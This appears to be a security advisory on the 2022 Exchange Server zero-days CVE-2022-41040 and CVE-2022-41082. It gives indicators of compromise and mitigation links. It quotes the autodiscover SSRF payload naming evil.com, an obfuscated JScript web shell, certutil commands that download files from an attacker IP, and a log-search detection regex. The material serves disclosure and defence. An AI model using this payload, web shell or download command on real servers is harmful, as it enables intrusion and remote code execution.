Exchange Server Zero-Day Security Vulnerability

Exchange Server Zero-Day Security Vulnerability

It was investigated by GTSC about a high* security vulnerability with a CVSS score of 8 and 6.3, and it was communicated to Microsoft about ZDI-CAN-18333 and ZDI-CAN-18802 and approved. Vulnerability that allows an attacker to execute certain broadly publicly manipulated programs and remote code on the Exchange Server.

Vulnerability has two part:

autodiscover/autodiscover.json?[@]evil.com/&Email=autodiscover/autodiscover.json%3f[@]evil.com
RCE is triggering by this payload. Payload using a endpoint at backend triggering RCE.

Injected into User-Agent value according to detected activities:

<%@Page Language="Jscript"%>

<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%

Due to the Char Encoding number 936, it is determined that a group of Chinese origin has a connection with the relevant Zero-Day.

"C:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\ RedirSuiteServiceProxy.aspx"

It is determined that the “RedirSuiteServiceProxy.aspx” in its path replaces the file content with the payload found above.

In the next command execution phase, it has been determined that the following commands are used to control connections in the Windows environment.

“cmd” /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f [h][t][t][p][s]://206[.]188[.]196[.]77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]

"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f [h][t][t][p][s]://httpbin[.]org/get c:\test&echo [S]&cd&echo [E]

Looking at the scripts, the phrase "[S]&cd&echo [E]" at the end of the scripts is reaffirmed that the group belongs to China, as it is known to be the signature of Chinese Chopper.

Malicious PEs and DLLs found on the exploited server:

C:\root\DrSDKCaller.exe
C:\Users\Public\all.exe
C:\Users\Public\dump.dll
C:\Users\Public\ad.exe
C:\PerfLogs\gpg-error.exe
C:\PerfLogs\cm.exe
C:\Program Files\Common Files\system\ado\msado32.tlb

In summary, when the Dll.dll on the server is analyzed:

https://*:443/ews/web/webconfig/
https://*:443/owa/auth/webcccsd/
https://*:444/ews/auto/
https://*:444/ews/web/api/
http://*:80/owa/auth/Current/script/
https://*:443/owa/auth/Current/script/

It has been determined that it creates a task that listens to the addresses above. It was determined that the information recorded during this listening was encrypted with the RC4 algorithm and sent to the C2 addresses of the Chinese group, 137[.]184[.]67[.]33.

Affected Systems

The following Exchange Server versions are affected:

• Exchange Server 2019 CU12 Aug22SU August 9, 2022 15.2.1118.12 15.02.1118.012
• It is not specified whether other versions of Exchange are suitable for exploitation.

IOC’s

Webshell:
File Name: pxh4HG1v.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx
File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx
File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx
File Name: Xml.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1
Path: Xml.ashx
File Name: errorEE.aspx
SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx
DLL:
File name: Dll.dll
SHA256:
074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82
45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9
9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0
29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3
c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2
File name: 180000000.dll (Dump to Svchost.exe)
SHA256:76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e
IP Addresses:
125[.]212[.]220[.]48
5[.]180[.]61[.]17
47[.]242[.]39[.]92
61[.]244[.]94[.]85
86[.]48[.]6[.]69
86[.]48[.]12[.]64
94[.]140[.]8[.]48
94[.]140[.]8[.]113
103[.]9[.]76[.]208
103[.]9[.]76[.]211
104[.]244[.]79[.]6
112[.]118[.]48[.]186
122[.]155[.]174[.]188
125[.]212[.]241[.]134
185[.]220[.]101[.]182
194[.]150[.]167[.]88
212[.]119[.]34[.]11

URL:
hxxp://206[.]188[.]196[.]77:8080/themes.aspx
C2:
137[.]184[.]67[.]33

Recommended Solution(s)

No patch for Zero-Day has been released yet. For this reason, it is recommended to detect with certain regex and keywords in the server logs for Exchange Servers.

Get-ChildItem -Recurse -Path -Filter "*.log" | Select-String -Pattern 'powershell.*autodiscover\.json.*\@.*200

It has been suggested that it can be detected with the script on the github address prepared by the GTSC company, which is the owner of the research.

https://github.com/ncsgroupvn/NCSE0Scanner

It is explained that measures can be taken by IIS by following the steps in the link below.

https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/

CVE / CWE

2022-41040 and 2022-41082 CVE numbers of the security vulnerability are reserved. It is expected to be publicly assigned in the future.

MITRE ATT&CK Mappig

Related Website

• https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html

* CVSS 3.1 scores (out of 10) of 4.0-6.9 are considered vulnerabilities as “medium”, 7.0-8.9 as “high”, 9.0-10.0 as “critical”.